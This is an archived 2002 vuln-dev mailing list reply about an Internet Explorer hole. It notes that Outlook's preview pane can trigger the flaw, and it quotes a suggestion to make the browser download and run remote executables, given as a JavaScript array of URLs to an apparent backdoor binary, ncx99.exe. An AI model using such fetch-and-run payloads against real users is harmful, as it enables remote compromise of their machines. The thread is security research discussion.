Vulnerability Development mailing list archives
RE: Rather large MSIE-hole
From: "Chad Thunberg" <chadth () nologin org>
Date: Thu, 14 Mar 2002 22:35:58 -0800
This is not limited to a user visiting a webpage. Outlook and Outlook express execute client side code in email per the IE settings assigned. A user doesn't even have to open the html formatted email with the js or this xml code embedded if they are using a preview pain. Also, if you look at the codebase and the functions surrounding it, you will realize that passing additional parameters separated by any type of space will not work. However, using this in conjunction with other methods and transports can be very powerful. -Chad -----Original Message----- From: KF [mailto:dotslash () snosoft com] Sent: Thursday, March 14, 2002 2:48 PM To: vuln-dev () security-focus com Subject: Re: Rather large MSIE-hole Another thought... will this bug run an executable from a web page? If so you could just make your own binary to do whatever you wanted. Like http://mysiteathome.com/malware.exe or something along those lines. I would HOPE that it asks to save the file to disk or even better ignore it all together. Maybe try something like: var programName=new Array( 'http://mysiteathome.com/ncx99.exe', 'http://someothersite.com/ncx99.exe', ); I would do this myself but I don't have any windows boxen to test. -KF Paul D. Campbell wrote:
Could you not create a batch file that housed the commands you wanted to run (with args) and just run the batch file? I apologise if someone has already addressed this. -EricYou would probably be able to do this. However, you would first need to place the batch file on the target machine. Then you would have to sit around and hope the user visits your malicious site. Though, if you have the capability to write to someone's harddrive you could do something much nastier than this :) Paul
Current thread:
- RE: Rather large MSIE-hole, (continued)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- RE: Rather large MSIE-hole Chad Thunberg (Mar 15)
- Re: Rather large MSIE-hole Joerg Over (Mar 15)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole John Swensson (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole The Blueberry (Mar 14)
- RE: Rather large MSIE-hole Keith Tyler (Mar 15)
- Re: Rather large MSIE-hole Slow2Show (Mar 15)
- RE: Rather large MSIE-hole Tiago Halm (Mar 16)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)